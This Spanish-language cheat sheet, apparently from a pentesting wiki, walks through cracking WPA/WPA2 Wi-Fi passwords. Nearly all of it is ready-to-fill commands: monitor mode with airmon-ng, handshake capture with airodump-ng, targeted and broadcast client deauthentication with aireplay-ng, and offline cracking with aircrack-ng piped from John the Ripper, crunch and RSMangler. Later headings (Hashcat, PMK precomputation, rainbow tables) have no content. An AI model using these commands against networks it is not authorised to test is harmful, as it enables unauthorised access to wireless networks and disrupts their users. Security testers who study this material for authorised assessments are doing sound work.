WPA/WPA2
WPA, Wi-Fi Protected Access.
Habilitar modo monitor en tarjeta inalámbrica.
sudo airmon-ng check kill && sudo airmon-ng start <interface> && iw dev <interface-mon> info
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && iw dev wlan0mon infoCaptura de paquetes para identificar BSSID, ESSID y canal objetivo.
sudo airodump-ng <interface-mon>Captura de paquetes de BSSID, ESSID y canal específico.
sudo airodump-ng <interface-mon> --bssid <BSSID> --essid <ESSID> -c <channel> -w <file-name> --output-format pcapDesautenticación de cliente(s).
# Desautenticación dirigida
sudo aireplay-ng -0 1 -a <BSSID> -c <client-mac-address> <interface-mon>
# Desautenticación broadcast
sudo aireplay-ng -0 1 -a <BSSID> <interface-mon>Cracking con Aircrack-ng.
# Wordlist
aircrack-ng -b <BSSID> -e <ESSID> -w <path-wordlist> <file-name>.cap
# John the Ripper y Aircrack-ng
john --wordlist=<path-wordlist> --rules --stdout | aircrack-ng -b <BSSID> -e <ESSID> -w - <file-name>.cap
# crunch y Aircrack-ng
crunch <min-word-length> <max-word-length> -t <word>%%% | aircrack-ng -b <BSSID> -e <ESSID> -w - <file-name>.cap
# RSMangler y Aircrack-ng
rsmangler --file <words.txt> --min <min-word-length> --max <max-word-length> | aircrack-ng -b <BSSID> -e <ESSID> -w - <file-name>.capCracking con Hashcat.
Cracking con Precálculo de Pairwise Master Keys (PMK).
Rainbow table.
Confirmar que la clave obtenida es correcta.
Última actualización
¿Te fue útil?